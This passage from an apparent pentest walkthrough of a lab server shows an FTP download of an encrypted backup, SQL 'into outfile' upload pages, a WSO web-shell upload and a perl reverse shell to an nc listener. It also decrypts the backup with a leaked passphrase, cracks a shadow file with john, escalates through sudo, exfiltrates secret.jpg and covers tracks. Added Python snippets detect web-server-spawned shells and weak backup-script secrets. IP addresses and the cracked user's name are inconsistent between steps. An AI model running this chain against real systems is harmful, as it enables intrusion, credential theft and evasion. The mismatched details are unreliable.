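# constructed subset of the post's output; SENSITIVE_GROUPS is an assumption.
SENSITIVE_GROUPS = {
    "sudo": "can run commands as root",
    "sshlogin": "allowed to log in over SSH",
    "ftpuser": "allowed to log in over FTP",
    "ftpadmin": "administers the FTP area",
}

SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:swillard
www-data:x:33:
ftpuser:x:997:rhedley,mbrown,ftp
ftpadmin:x:999:rhedley,swillard
sshlogin:x:998:swillard,mbrown
mbrown:x:1001:
"""

# constructed after the "ls -all" output shown above
SAMPLE_LS = """\
d-wxrwx-wx+ 1 ftp ftpadmin 60 May 13 2013 incoming
drwxr-xr-x 2 1000 1000 36 May 12 2013 sraines
"""


def parse_group(text):
    """Return {group: [members]} from /etc/group content; malformed lines are skipped."""
    groups = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 4 or not parts[0]:
            continue
        groups[parts[0]] = [m for m in parts[3].split(",") if m]
    return groups


def access_review(group_text):
    """Return {user: sorted sensitive groups} for every user holding at least one."""
    review = {}
    for group, members in parse_group(group_text).items():
        if group in SENSITIVE_GROUPS:
            for user in members:
                review.setdefault(user, []).append(group)
    return {user: sorted(groups) for user, groups in review.items()}


def world_writable_dirs(ls_text):
    """From 'ls -l' lines, return (name, kind) for directories writable by 'other'.

    kind is "listable" when others can also read the directory, and
    "blind drop" when they can write into it but not list it, which is the
    case of the incoming folder above.
    """
    found = []
    for line in ls_text.splitlines():
        fields = line.split()
        if len(fields) < 9 or not fields[0].startswith("d"):
            continue
        # mode string: 'd' + owner rwx + group rwx + other rwx (+ optional ACL marker)
        other = fields[0][7:10]
        if "w" in other:
            found.append((fields[-1], "listable" if "r" in other else "blind drop"))
    return found


if __name__ == "__main__":
    for user, groups in sorted(access_review(SAMPLE_GROUP).items()):
        print(user, "->", ", ".join(SENSITIVE_GROUPS[g] for g in groups))
    print(world_writable_dirs(SAMPLE_LS))
```

On the constructed data the review singles out swillard (sudo plus SSH and FTP administration) and the write-only “incoming” directory, the two facts the walkthrough goes on to use.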


8. Gaining Access phase:
a) We now try to connect to the Target machine via the “ftp” service. Because we are interested in accessing the “incoming” folder owned by the “ftp” user and the “ftpadmin” group, we’ll be using the “rhedley” credentials - password = “tum-ti-tum”.

root@Kali:~# ftp 192.168.100.138
Connected to 192.168.100.138.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.100.138]
Name (192.168.100.138:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> pwd
257 "/rhedley" is the current directory
ftp> cd ..
250 CWD command successful
ftp> ls
227 Entering Passive Mode (192,168,100,138, 182, 138).
ftp: connect: Connection refused
ftp> quit
221 Goodbye.
root@Kali:~#


9. Gathering Information phase:
a) Can we access the “incoming” folder? Yes, and more than that: we can download the content of the folder to our local machine:

root@Kali:~# ftp 192.168.100.138
Connected to 192.168.100.138.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.100.138]
Name (192.168.100.138:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/rhedley" is the current directory
ftp> cd ../ftp/incoming
250 CWD command successful
ftp> pwd
257 "/ftp/incoming" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
--w-rwx-w-   1 ftp      ftpuser     47984 Jan 11  2013 backup_webhost_130111.tar.gz.enc
226 Transfer complete
ftp> get backup_webhost_130111.tar.gz.enc /root/Desktop/backup_webhost_copy.tar.gz.enc
local: /root/Desktop/backup_webhost_copy.tar.gz.enc remote: backup_webhost_130111.tar.gz.enc
200 PORT command successful
150 Opening BINARY mode data connection for backup_webhost_130111.tar.gz.enc (47984 bytes)
226 Transfer complete
47984 bytes received in 0.00 secs (13.7918 MB/s)
ftp> exit
221 Goodbye.
root@kali:~# 
root@kali:~# ls /root/Desktop/ -all | grep 'backup'
-rw-r--r--  1 root root 47984 Oct 23 22:57 backup_webhost_copy.tar.gz.enc
root@kali:~#


b) Are there other “backup” files on the system? Maybe the script used to create the backup file in the first place?

http://192.168.100.138/forum/templates_c/cmd.php?cmd=locate / | grep 'backup'
/home/ftp/lac-backup.iso
/home/ftp/lac-backup.iso.md5
/lib/modules/3.5.0-26-generic/kernel/drivers/power/wm831x_backup.ko
/lib/modules/3.5.0-27-generic/kernel/drivers/power/wm831x_backup.ko
/lib/modules/3.5.0-28-generic/kernel/drivers/power/wm831x_backup.ko
/lib/partman/commit.d/20remove_backup
/lib/partman/init.d/95backup
/lib/partman/undo.d/70unbackup
/opt/backup.sh
/usr/bin/db5.1_hotbackup
/usr/bin/db_hotbackup
/usr/share/doc/tmux/examples/tmux_backup.sh
/usr/share/man/man1/db5.1_hotbackup.1.gz
/usr/share/man/man1/db_hotbackup.1.gz
/usr/share/postfixadmin/backup.php
/var/backups
/var/backups/apt.extended_states.0
/var/backups/apt.extended_states.1.gz
/var/backups/apt.extended_states.2.gz
/var/backups/apt.extended_states.3.gz
/var/backups/apt.extended_states.4.gz
/var/backups/apt.extended_states.5.gz
/var/backups/dpkg.status.0
/var/backups/dpkg.status.1.gz
/var/backups/dpkg.status.2.gz
/var/backups/dpkg.status.3.gz
/var/backups/dpkg.status.4.gz
/var/backups/dpkg.status.5.gz
/var/backups/group.bak
/var/backups/gshadow.bak
/var/backups/mail-stack-delivery
/var/backups/passwd.bak
/var/backups/shadow.bak
/var/backups/mail-stack-delivery/main.cf-backup
/var/cache/dbconfig-common/backups
/var/www/forum/backup
/var/www/forum/backup/.htaccess
/var/www/forum/themes/default/images/backup.png


Of course. There is a script, but its content is not available to users other than “root” and those in the “root” group:
http://192.168.100.138/forum/templates_c/cmd.php?cmd=ls /opt/backup.sh -all
admin -rwxrw----+ 1 root root 654 May 13 2013 /opt/backup.sh


10. Maintaining Access phase:
a) We need access to a shell on the Target machine. After searching for a few examples, I stopped at a php shell, wso2.5.1.php, available on GitHub. The file needs to be uploaded to the Target machine.

b) First, we’ll add an upload function to the server. For this we’ll use the same approach as in Step #7: using phpMyAdmin, we’ll run the following two statements, which will create two files on the server, one used to select the file to be uploaded (“upload.php”) and a second (“getfile.php”) that performs the upload to the predefined location. Here is the code to be executed:
select '<!DOCTYPE html><head><title>File Upload Form</title></head><body>This form allows you to upload a file to the server.<br> <form action="getfile.php" method="post" enctype="multipart/form-data"><br>Type (or select) Filename: <input type="file" id="uploadFile" name="uploadFile"><input type="submit" value="Upload File"></form></body></html>' into outfile "/var/www/forum/templates_c/upload.php";
select "<!DOCTYPE html><head><title>Process Uploaded File</title></head><body><?php $my_folder = '/var/www/forum/templates_c/'; $my_folder = $my_folder.basename( $_FILES['uploadFile']['name']); chmod($my_folder, 0777); if (move_uploaded_file ($_FILES ['uploadFile'] ['tmp_name'], $my_folder)){ echo 'File is valid, and was successfully uploaded.\n'; chown($my_folder, 'root'); } else { echo 'Here is some more debugging info:';print_r($_FILES);echo '\n file name = '.$my_folder;}?></body></html>" into outfile "/var/www/forum/templates_c/getfile.php";


By browsing to the following URL, we can verify that the two .php files were created:
http://192.168.100.138/forum/templates_c/

c) Next we’ll open “upload.php” in the web browser and upload the “wso2.5.1.php” file that we just downloaded to the local machine. It is straightforward, so I will not give additional explanations. A message will be returned to the browser to confirm that the upload was successful.

d) Now that the php webshell is uploaded, let’s access it:

http://192.168.100.138/forum/templates_c/wso2.5.1.php
=== http://192.168.100.138/forum/templates_c/wso2.5.1.php ==
|   Uname:                                                                                                 |
|   User:                                                                                                      |
|   Php:                                                                                                       |
|   Hdd:                                                                                                      |
|   Cwd:                                                                                                      |
|    [Sec. Info] [Files] [Console]       ...     [Network] [Selfremove]   |
|                                                                                                                  |
|                                                                                                                  |
|                                                                                                                  |
|                                                                                                                  |
|  ...                                                                                                             |
============================================


e) From the “Network” tab we can launch a reverse shell. This is done in two steps:
From the command shell:
root@kali:~# nc -n -l -p 80 -vvv

From the php webshell:
==== http://192.168.100.138/forum/templates_c/wso2.5.1.php ====
|   Uname:                                                                                                        |
|   User:                                                                                                             |
|   Php:                                                                                                              |
|   Hdd:                                                                                                             |
|   Cwd:                                                                                                             |
|    [Sec. Info] [Files] [Console]       ...     [Network] [Selfremove]          |
|    Network tools                                                                                             |
|                                                                                                                         |
|    Bind port to /bin/sh [perl]                                                                     |
|    Back-connect [perl]                                                                                  |
|        Server: 192.168.100.130      Port: 80      >>                                      |
==============================================


As a result, the reverse shell connection is initiated:
root@kali:~# nc -n -l -p 80 -vvv
listening on [any] 80 ...
connect to [192.168.100.130] from (UNKNOWN) [192.168.100.138] 43357
/bin/sh: 0: can't access tty; job control turned off
$
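On the defender’s side, the chain this step creates (apache2 running as www-data, spawning perl, spawning /bin/sh) is visible in a plain process listing. The following host check is an added example, not part of the original write-up: the snapshot is constructed to mirror that chain, assumes the `ps -eo pid,ppid,user,comm,args` column layout, and replaces the perl argument with “...”.

```python
"""Flag shells and interpreters that have a web-server process as an ancestor.

Added example (not from the original write-up). SNAPSHOT is a constructed
`ps -eo pid,ppid,user,comm,args` listing mirroring the page's reverse shell:
apache2 -> perl -> /bin/sh -> su; the perl payload is replaced by "...".
"""

SNAPSHOT = """\
  PID  PPID USER     COMMAND  ARGS
    1     0 root     init     /sbin/init
 1204     1 root     apache2  /usr/sbin/apache2 -k start
 1210  1204 www-data apache2  /usr/sbin/apache2 -k start
 1211  1204 www-data apache2  /usr/sbin/apache2 -k start
 2451  1210 www-data perl     perl -e ...
 2452  2451 www-data sh       /bin/sh -i
 2460  2452 www-data su       su - rhedley
 3001     1 root     sshd     /usr/sbin/sshd -D
"""

# Process names a web server should normally never be the parent of
# (assumption: extend for the stack in use; mod_php system() calls also show
# up here, and those deserve review too).
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm"}
SUSPECT = {"sh", "bash", "dash", "perl", "python", "python3", "nc", "ncat", "su", "sudo"}


def parse_ps(text):
    """Return {pid: (ppid, user, comm, args)}; the header line is skipped."""
    procs = {}
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        pid, ppid, user, comm, args = line.split(None, 4)
        procs[int(pid)] = (int(ppid), user, comm, args)
    return procs


def web_ancestor(procs, pid):
    """Walk up the parent chain; return the nearest web-server pid or None."""
    seen = set()
    ppid = procs[pid][0]
    while ppid in procs and ppid not in seen:
        seen.add(ppid)
        if procs[ppid][2] in WEB_SERVERS:
            return ppid
        ppid = procs[ppid][0]
    return None


def find_webserver_shells(text):
    """Return sorted [(pid, comm, web_server_pid)] for suspect processes
    descended from a web server, whatever user they now run as."""
    procs = parse_ps(text)
    hits = []
    for pid, (_ppid, _user, comm, _args) in sorted(procs.items()):
        if comm in SUSPECT:
            ancestor = web_ancestor(procs, pid)
            if ancestor is not None:
                hits.append((pid, comm, ancestor))
    return hits


if __name__ == "__main__":
    for pid, comm, ancestor in find_webserver_shells(SNAPSHOT):
        print(f"pid {pid} ({comm}) descends from web server pid {ancestor}")
```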


f) On the remote shell, let’s connect as rhedley and read the content of /opt/backup.sh, if possible:
su - rhedley
$ su - rhedley
Password: tum-ti-tum
rhedley@webhost:~$ id
id
uid=1002(rhedley) gid=1002(rhedley) groups=1002(rhedley),997(ftpuser),999(ftpadmin)
rhedley@webhost:~$ cat /opt/backup.sh
cat /opt/backup.sh
#!/bin/bash
## Backup Script
## by SRaines
## Lazy Admin Corp
TMPBACKUP="/tmp/backup";
NAME_PREFIX="backup";
NAME_DATE=$(date +%y%m%d);
NAME_HOST=$(/bin/hostname);
FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;
[ ! -d ${TMPBACKUP} ] && mkdir -p ${TMPBACKUP}
tar cpf ${TMPBACKUP}/${FILENAME} /etc/fstab /etc/apache2 /etc/hosts /etc/motd /etc/ssh/sshd_config /etc/dovecot /etc/postfix /var/www /home /opt
gzip --best -f ${TMPBACKUP}/${FILENAME}
openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
mv ${TMPBACKUP}/${FILENAME}.gz.enc ./
rm -fr ${TMPBACKUP}
rhedley@webhost:~$


Interestingly, the script shows the exact encryption command, including the algorithm and the passphrase, used to protect the backup file we downloaded:

openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
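Three things make this line a finding in its own right: the passphrase is on the command line (readable by anyone who can read the script, and visible in the process list while openssl runs), `openssl enc` without `-pbkdf2` derives the key with a single hash iteration, and the staging path is a fixed directory under /tmp. The scanner below is an added example, not part of the original write-up: it runs these rules over a copy of the script constructed from the listing above with the real passphrase replaced by a placeholder, and the rule set is this example’s own.

```python
"""Scan a shell script for the secret-handling weaknesses seen in backup.sh.

Added example (not from the original write-up). BACKUP_SH is constructed
from the page's /opt/backup.sh with the real passphrase replaced by a
placeholder; the rules and remediation text are this example's own.
"""
import re

BACKUP_SH = """\
#!/bin/bash
TMPBACKUP="/tmp/backup";
FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;
tar cpf ${TMPBACKUP}/${FILENAME} /etc/ssh/sshd_config /var/www /home /opt
gzip --best -f ${TMPBACKUP}/${FILENAME}
openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:PLACEHOLDER_SECRET
mv ${TMPBACKUP}/${FILENAME}.gz.enc ./
"""

PASS_ON_CMDLINE = re.compile(r"(?:-pass\s+pass:|\s-k\s+)\S+")
LITERAL_TMP = re.compile(r"""["']?/tmp/""")


def is_openssl_enc(line):
    """True for an openssl symmetric-encryption call: `openssl enc ...` or the
    cipher-name form `openssl aes-256-cbc ...` used by the script."""
    toks = line.split()
    return len(toks) > 1 and toks[0] == "openssl" and (
        toks[1] == "enc" or re.match(r"-?(aes|des|camellia)-", toks[1]) is not None)


# (rule id, predicate over one line, remediation). Order fixes output order.
RULES = [
    ("inline-passphrase",
     lambda l: PASS_ON_CMDLINE.search(l) is not None,
     "use -pass file:<key file owned by root, mode 0600>; a pass: argument is "
     "readable by anyone who can read the script and shows up in ps output"),
    ("no-pbkdf2",
     lambda l: is_openssl_enc(l) and "-pbkdf2" not in l,
     "add -pbkdf2 -iter <N>; without it the key is derived with one hash "
     "iteration, so a leaked archive is cheap to brute-force offline"),
    ("predictable-tmp",
     lambda l: LITERAL_TMP.search(l) is not None and "mktemp" not in l,
     "stage under a root-only directory created with mktemp -d"),
]


def scan_script(text):
    """Return [(line_number, rule_id), ...] for every rule that fires."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for rule_id, hit, _fix in RULES:
            if hit(line):
                findings.append((number, rule_id))
    return findings


def report(text):
    """Human-readable findings with the remediation for each rule."""
    fixes = {rule_id: fix for rule_id, _hit, fix in RULES}
    return [f"line {n}: {rule_id}: {fixes[rule_id]}" for n, rule_id in scan_script(text)]


if __name__ == "__main__":
    for entry in report(BACKUP_SH):
        print(entry)
```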

g) Let’s decrypt the backup file:
root@kali:~# ls /root/Desktop/ -all | grep 'backup'
-rw-r--r--  1 root root 47984 Oct 23 22:57 backup_webhost_copy.tar.gz.enc
root@kali:~# cd /root/Desktop/
root@kali:~/Desktop# openssl enc -d -aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out decrypted_backup.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
root@kali:~/Desktop# tar xvzf decrypted_backup.tar.gz
tar xvzf decrypted_backup.tar.gz
etc/
etc/ssh/
etc/ssh/moduli
...
etc/shadow
...
etc/gconf/gconf.xml.mandatory/%gconf-tree.xml
etc/passwd
root@kali:~/Desktop#


h) Interestingly enough, there is a copy of the shadow file saved with the backup, so the next step is to crack it to get the passwords for the root and/or swillard users.
root@kali:~/Desktop# john --wordlist="client/darkc0de.lst" --format=sha512crypt shadow
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:02:13 3.06% (ETA: 18:46:46) 0g/s 368.7p/s 1137c/s 1137C/s 12ibb0n..13mm0c973
0g 0:00:02:15 3.19% (ETA: 18:45:02) 0g/s 378.3p/s 1135c/s 1135C/s 13mm4..14min43
0g 0:00:11:42 14.91% (ETA: 18:52:55) 0g/s 361.3p/s 1089c/s 1089C/s GROSSENBACHER..Gasolec
0g 0:00:11:44 15.02% (ETA: 18:52:33) 0g/s 363.1p/s 1089c/s 1089C/s Gasoline..Giebler
0g 0:00:12:29 15.90% (ETA: 18:52:58) 0g/s 363.4p/s 1090c/s 1090C/s Hausa..Hermeneutically
0g 0:00:12:31 15.90% (ETA: 18:53:11) 0g/s 362.3p/s 1089c/s 1089C/s Hausa..Hermeneutically
brillantissimo   (sraines)
mbrown           (mbrown)
2g 0:00:45:35 DONE (2015-11-21 18:20) 0.000731g/s 537.6p/s 1118c/s 1118C/s zrp..�f
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Desktop# john --show
Password files required, but none specified
root@kali:~/Desktop# john --show shadow
sraines:brillantissimo:15773:0:99999:7:::
mbrown:mbrown:15773:0:99999:7:::
2 password hashes cracked, 1 left
root@kali:~/Desktop#


i) And we found the password for the swillard user. Let’s see if it helps to get access to root’s home folder. To do that, let’s go back to the remote shell and from there connect as swillard and elevate his permissions to root.
As a root-level user, the content of the /root/ folder can be displayed and the “secret.jpg” file is copied into rhedley’s home folder with permissions that allow anyone to access it, because the next step will be to download the file from the Target machine onto the Attacker’s machine.

root@kali:~# nc -n -l -p 80 -vvv
listening on [any] 80 ...
connect to [192.168.100.193] from (UNKNOWN) [192.168.100.128] 43361
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/sh")'
...
$ su - swillard
su - swillard
Password: brillantissimo
swillard@webhost:~$ sudo -s
sudo -s
[sudo] password for swillard: brillantissimo

root@webhost:~# cd /root
cd /root
root@webhost:/root# ls
ls
cleanlogs.sh  secret.jpg
root@webhost:/root# cp secret.jpg /home/rhedley/secret.jpg
cp secret.jpg /home/rhedley/secret.jpg
root@webhost:/root# chmod 777 /home/rhedley/secret.jpg
chmod 777 /home/rhedley/secret.jpg
root@webhost:/root# ls -al /home/rhedley/secret.jpg
ls -al /home/rhedley/secret.jpg
-rwxrwxrwx 1 root root 22852 Nov 22 01:17 /home/rhedley/secret.jpg
root@webhost:/root# exit
exit
exit
swillard@webhost:~$  root@kali:~/Desktop#


As mentioned already, let’s download the “secret.jpg” file:

root@kali:~/Desktop# ftp 192.168.100.128
Connected to 192.168.100.128.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.100.128]
Name (192.168.100.128:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxrwx   1 root     root        22852 Nov 22 00:17 secret.jpg
-rw-r-----   1 rhedley  rhedley      1056 Nov 21 22:28 shadow
226 Transfer complete
ftp> get secret.jpg /root/Desktop/secret.jpg
local: /root/Desktop/secret.jpg remote: secret.jpg
200 PORT command successful
150 Opening BINARY mode data connection for secret.jpg (22852 bytes)
226 Transfer complete
22852 bytes received in 0.01 secs (1.5281 MB/s)
ftp> quit
221 Goodbye.
root@kali:~/Desktop# ls
secret.jpg  shadow 
root@kali:~/Desktop#


CONGRATULATIONS! The sensitive file located under the root/admin home folder, “secret.jpg” was downloaded from the Target machine. And the last phase is…

11. Covering Tracks phase:
a) We’ll use the php webshell. First of all, we’ll delete the files uploaded during this pentest:
The one(s) located in /home/rhedley/
root@kali:~# nc -n -l -p 80 -vvv
listening on [any] 80 ...
connect to [192.168.100.193] from (UNKNOWN) [192.168.100.128] 43361
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/sh")'
...
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ su - rhedley
su - rhedley
Password: tum-ti-tum


rhedley@webhost:~$ ls
ls
secret.jpg 
rhedley@webhost:~$ rm secret.jpg
rm secret.jpg
rhedley@webhost:~$ ls
ls
rhedley@webhost:~$


The one(s) uploaded in /var/www/forum/templates_c/:
==== http://192.168.100.138/forum/templates_c/wso2.5.1.php ====
|   Uname:                                                                                                        |
|   User:                                                                                                             |
|   Php:                                                                                                              |
|   Hdd:                                                                                                             |
|   Cwd: /var/www/forum/templates_c/ drwxrwxrwx [ home ]           |
|    [Sec. Info] [Files] [Console]       ...     [Network] [Selfremove]          |
|    File Manager                                                                                              |
|                                                                                                                         |
|    ...                                                                                                                  |
|        cmd.php                                                                                                 |
|        getfile.php                                                                                              |
|        upload.php                                                                                             |
|        wso2.5.1.php                                                                                          |
|  delete     >>                                                                                                  |
|  ...                                                                                                                    |
===============================================


b) In the end, we’ll delete the php webshell itself. The function is under “Selfremove” tab:
==== http://192.168.100.138/forum/templates_c/wso2.5.1.php =====
|   Uname:                                                                                                             |
|   User:                                                                                                                  |
|   Php:                                                                                                                   |
|   Hdd:                                                                                                                  |
|   Cwd: /var/www/forum/templates_c/ drwxrwxrwx [ home ]                |
|    [Sec. Info] [Files] [Console]       ...     [Network] [Selfremove]               |
|    Suicide                                                                                                             |
|    remove the shell?                                                                                           |
|    Yes                                                                                                                    |
|  ...                                                                                                                         |
================================================


Conclusion:
Each pentest exercise is a succession of steps. They can be grouped into the categories/phases discussed in the introduction of this article, but the order in which they are executed is not fixed, except probably for the first and the last step. Any of the steps might be repeated, depending on what information is learned about the system and whether it can be used to gain access to the Target system. In the end, the goal is the same: getting access to the sensitive information located on the Target machine.